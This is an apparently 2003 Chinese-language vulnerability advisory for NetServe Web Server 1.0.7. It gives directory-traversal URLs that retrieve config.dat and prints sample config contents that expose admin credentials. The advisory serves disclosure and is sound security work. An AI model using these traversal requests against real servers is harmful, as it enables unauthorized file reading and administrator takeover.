应用程序 : NetServe Web Server
日期 : 17.11.2003
版本 : 1.0.7 (或更低版本)
平台 : Windows NT, 95, 98, 2000, and XP.
严重性 : 高
本地 : 是
远程 : 是
测试环境 : WinXP and Win2K.
描述：netserve新增安全缺陷
详细：
netserve是一款提高web服务和文件共享的应用程序，运行于Windows NT, 95, 98, 2000, and XP系列平台上。该缺陷允许远程攻击者查看任意目录，查看服务器配置文件，能获得netserve管理员密码。
1）目录遍历：
NetServe server没有正确的过滤提交的请求中所包含的“/../../”特殊字符，能允许攻击者查看HTML根目录下的所有文件。
攻击方法：
http://[victim]/../test/
允许查看文件夹- /test/
http://[victim]/../test/test.txt
运行查看 /test/文件夹下的文件
2）netserve配置文件默认放在wwwroot目录下，通过向目标主机发送进行构造的URL地址能获得配置文件。配置文件代码中包含如下代码:
Users username|password|...
攻击方法：
http://[victim]/../config.dat
Example of a file:
================
EnableCGI True
EnableRemoteAdmin True
EnableSSI False
EnablePasswords True
IndexFiles index.html index.htm
SSIAbbrevSize True
SSIExtensions shtml
SSIErrorMessage An SSI Error Has Occured
SSITimeFormat
AuthenticationType Basic
Port 80
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\
Logging True
Counter False
Minimized True
ActivateOnStart False
MimeTypes application/mac-binhex40|hqx
MimeTypes application/msword|doc
MimeTypes application/octet-stream|bin dms lha lzh exe class
MimeTypes application/pdf|pdf
MimeTypes application/postscript|ai eps ps
MimeTypes application/smil|smi smil
MimeTypes application/vnd.mif|mif
MimeTypes application/vnd.ms-asf|asf
MimeTypes application/vnd.ms-excel|xls
MimeTypes application/vnd.ms-powerpoint|ppt
MimeTypes application/x-cdlink|vcd
MimeTypes application/x-compress|Z
MimeTypes application/x-cpio|cpio
MimeTypes application/x-csh|csh
MimeTypes application/x-director|dcr dir dxr
MimeTypes application/x-dvi|dvi
MimeTypes application/x-gtar|gtar
MimeTypes application/x-gzip|gz
MimeTypes application/x-javascript|js
MimeTypes application/x-latex|latex
MimeTypes application/x-sh|sh
MimeTypes application/x-shar|shar
MimeTypes application/x-shockwave-flash|swf
MimeTypes application/x-stuffit|sit
MimeTypes application/x-tar|tar
MimeTypes application/x-tcl|tcl
MimeTypes application/x-tex|tex
MimeTypes application/x-texinfo|texinfo texi
MimeTypes application/x-troff|t tr roff
MimeTypes application/x-troff-man|man
MimeTypes application/x-troff-me|me
MimeTypes application/x-troff-ms|ms
MimeTypes application/zip|zip
MimeTypes audio/basic|au snd
MimeTypes audio/midi|mid midi kar
MimeTypes audio/mpeg|mpga mp2 mp3
MimeTypes audio/x-aiff|aif aiff aifc
MimeTypes audio/x-pn-realaudio|ram rm
MimeTypes audio/x-realaudio|ra
MimeTypes audio/x-wav|wav
MimeTypes image/bmp|bmp
MimeTypes image/gif|gif
MimeTypes image/ief|ief
MimeTypes image/jpeg|jpeg jpg jpe
MimeTypes image/png|png
MimeTypes image/tiff|tiff tif
MimeTypes image/x-cmu-raster|ras
MimeTypes image/x-portable-anymap|pnm
MimeTypes image/x-portable-bitmap|pbm
MimeTypes image/x-portable-graymap|pgm
MimeTypes image/x-portable-pixmap|ppm
MimeTypes image/x-rgb|rgb
MimeTypes image/x-xbitmap|xbm
MimeTypes image/x-xpixmap|xpm
MimeTypes image/x-xwindowdump|xwd
MimeTypes image/x-icon|ico
MimeTypes model/iges|igs iges
MimeTypes model/mesh|msh mesh silo
MimeTypes model/vrml|wrl vrml
MimeTypes text/css|css
MimeTypes text/html|html htm
MimeTypes text/plain|asc txt
MimeTypes text/richtext|rtx
MimeTypes text/rtf|rtf
MimeTypes text/sgml|sgml sgm
MimeTypes text/tab-separated-values|tsv
MimeTypes text/xml|xml
MimeTypes video/mpeg|mpeg mpg mpe
MimeTypes video/quicktime|qt mov
MimeTypes video/x-msvideo|avi
Users nimber|password||bmltYmWyfnZpFXmuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
================
3）利用上述方法，我们能获得netserve管理员远程管理密码。他允许我们完全改变服务器配置！
====[config.dat]====
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
====[config.dat]====
解决方案：
目前厂商未公布该缺陷补丁，请用户及时关注厂商站点：
http://www.starlots.com/netx/index.html